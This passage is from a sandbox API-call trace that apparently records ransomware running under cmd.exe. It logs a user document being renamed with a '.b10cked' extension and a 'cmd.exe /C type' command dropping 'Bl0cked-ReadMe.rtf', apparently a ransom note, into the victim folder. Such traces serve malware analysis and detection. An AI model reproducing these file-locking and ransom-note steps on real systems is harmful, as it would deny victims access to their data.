(_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0136.434] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0136.434] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0136.434] _wcsicmp (_String1="92pj.doc", _String2=".") returned 11 [0136.434] _wcsicmp (_String1="92pj.doc", _String2="..") returned 11 [0136.434] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc")) returned 0x20 [0136.435] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4b1ea8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.435] SetErrorMode (uMode=0x0) returned 0x0 [0136.435] SetErrorMode (uMode=0x1) returned 0x0 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", nBufferLength=0x104, lpBuffer=0x30ec7c, lpFilePart=0x30ec64 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", lpFilePart=0x30ec64*="92pj.doc") returned 0x35 [0136.435] SetErrorMode (uMode=0x0) returned 0x1 [0136.435] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t")) returned 0x10 [0136.435] _wcsicmp (_String1="92pj.doc", _String2=".") returned 11 [0136.435] _wcsicmp (_String1="92pj.doc", _String2="..") returned 11 [0136.435] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc")) returned 0x20 [0136.435] SetErrorMode (uMode=0x0) returned 0x0 [0136.435] SetErrorMode (uMode=0x1) returned 0x0 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", nBufferLength=0x104, lpBuffer=0x30f0f8, lpFilePart=0x30ee90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", lpFilePart=0x30ee90*="92pj.doc") returned 0x35 [0136.435] SetErrorMode (uMode=0x0) returned 0x1 [0136.435] SetErrorMode (uMode=0x0) returned 0x0 [0136.435] SetErrorMode (uMode=0x1) returned 0x0 [0136.435] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked", nBufferLength=0x104, lpBuffer=0x30f300, lpFilePart=0x30ee90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked", lpFilePart=0x30ee90*="92pj.doc.b10cked") returned 0x3d [0136.435] SetErrorMode (uMode=0x0) returned 0x1 [0136.435] SetLastError (dwErrCode=0x0) [0136.435] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc.b10cked")) returned 0xffffffff [0136.435] GetLastError () returned 0x2 [0136.435] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", 
fInfoLevelId=0x1, lpFindFileData=0x30e80c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30e80c) returned 0x4a0f08 [0136.436] FindNextFileW (in: hFindFile=0x4a0f08, lpFindFileData=0x30e80c | out: lpFindFileData=0x30e80c) returned 0 [0136.436] GetLastError () returned 0x12 [0136.436] FindClose (in: hFindFile=0x4a0f08 | out: hFindFile=0x4a0f08) returned 1 [0136.437] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", fInfoLevelId=0x1, lpFindFileData=0x4b1c48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b1c48) returned 0x4a0f08 [0136.437] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked", nBufferLength=0x104, lpBuffer=0x30eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked", lpFilePart=0x0) returned 0x3d [0136.437] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", nBufferLength=0x104, lpBuffer=0x30eaa4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc", lpFilePart=0x0) returned 0x35 [0136.437] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc")) returned 0x20 [0136.437] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\92pj.doc.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\92pj.doc.b10cked"), dwFlags=0x3) returned 1 [0136.438] FindClose (in: hFindFile=0x4a0f08 | out: hFindFile=0x4a0f08) returned 1 [0136.438] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x30ea58 | out: _Buffer=" 1") 
returned 9 [0136.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.438] GetFileType (hFile=0x7) returned 0x2 [0136.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.461] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x30e9e4 | out: lpMode=0x30e9e4) returned 1 [0136.462] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.462] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x30ea18 | out: lpConsoleScreenBufferInfo=0x30ea18) returned 1 [0136.464] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0136.464] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x30ea58 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0136.464] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x30ea3c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x30ea3c*=0x1a) returned 1 [0136.465] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.465] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.482] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.483] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.483] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.484] SetConsoleInputExeNameW () returned 0x1 [0136.484] GetConsoleOutputCP () returned 0x1b5 [0136.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.484] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.487] exit (_Code=0) Process: id = "142" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166e0" os_pid = "0xc7c" 
os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13771 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13772 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13773 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13774 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 13775 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13776 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13777 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = 
"\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13778 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13779 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 13780 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 14017 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14018 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14019 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 14020 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 14021 start_va = 0x2f0000 end_va = 0x356fff entry_point = 0x2f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14022 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 14023 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14024 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = 
"\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 14025 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14026 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14027 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 14028 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 14029 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 14030 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 14107 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 14108 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 14109 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 14110 
start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 14111 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 14112 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 14113 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 14114 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 14115 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 14116 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 199 os_tid = 0xc98 [0136.282] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efc7c | out: lpSystemTimeAsFileTime=0x2efc7c*(dwLowDateTime=0x8b2a2240, dwHighDateTime=0x1d440a9)) [0136.282] GetCurrentProcessId () returned 0xc7c [0136.282] GetCurrentThreadId () returned 0xc98 [0136.282] GetTickCount () returned 0x2b144 [0136.282] QueryPerformanceCounter (in: lpPerformanceCount=0x2efc74 | out: lpPerformanceCount=0x2efc74*=19307120176) returned 1 [0136.283] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0136.283] __set_app_type (_Type=0x1) [0136.283] __p__fmode () returned 0x76b331f4 [0136.283] __p__commode () returned 0x76b331fc [0136.283] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0136.283] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 
[0136.283] GetCurrentThreadId () returned 0xc98 [0136.283] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xc98) returned 0x38 [0136.283] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.283] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0136.283] SetThreadUILanguage (LangId=0x0) returned 0x409 [0136.322] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0136.323] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efc0c | out: phkResult=0x2efc0c*=0x0) returned 0x2 [0136.323] VirtualQuery (in: lpAddress=0x2efc43, lpBuffer=0x2efbdc, dwLength=0x1c | out: lpBuffer=0x2efbdc*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efbdc, dwLength=0x1c | out: lpBuffer=0x2efbdc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efbdc, dwLength=0x1c | out: lpBuffer=0x2efbdc*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2efbdc, dwLength=0x1c | out: lpBuffer=0x2efbdc*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0136.323] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efbdc, dwLength=0x1c | out: lpBuffer=0x2efbdc*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c 
[0136.323] GetConsoleOutputCP () returned 0x1b5 [0136.326] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0136.326] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0136.326] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.326] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0136.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0136.329] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.329] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0136.330] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.330] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0136.332] _get_osfhandle (_FileHandle=0) returned 0x3 [0136.332] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0136.343] GetEnvironmentStringsW () returned 0xb01a8* [0136.344] FreeEnvironmentStringsW (penv=0xb01a8) returned 1 [0136.344] GetEnvironmentStringsW () returned 0xb01a8* [0136.344] FreeEnvironmentStringsW (penv=0xb01a8) returned 1 [0136.344] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb7c | out: phkResult=0x2eeb7c*=0x40) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0xd0, lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x1, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | 
out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0x1, lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x0, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x40, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x40, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0x40, lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.344] RegCloseKey (hKey=0x40) returned 0x0 [0136.344] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eeb7c | out: phkResult=0x2eeb7c*=0x40) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0x40, lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x1, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0x1, 
lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.344] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x0, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.345] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x9, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.345] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x4, lpData=0x2eeb88*=0x9, lpcbData=0x2eeb80*=0x4) returned 0x0 [0136.345] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2eeb84, lpData=0x2eeb88, lpcbData=0x2eeb80*=0x1000 | out: lpType=0x2eeb84*=0x0, lpData=0x2eeb88*=0x9, lpcbData=0x2eeb80*=0x1000) returned 0x2 [0136.345] RegCloseKey (hKey=0x40) returned 0x0 [0136.345] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88636a [0136.345] srand (_Seed=0x5b88636a) [0136.345] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" [0136.345] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf\"" [0136.345] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.345] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb1908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0136.345] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | 
out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0136.345] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0136.346] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.346] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0136.346] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0136.346] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0136.346] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0136.346] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0136.346] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0136.346] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0136.346] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0136.346] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0136.346] GetEnvironmentStringsW () returned 0xb22f8* [0136.346] FreeEnvironmentStringsW (penv=0xb22f8) returned 1 [0136.346] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.346] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0136.346] _wcsicmp 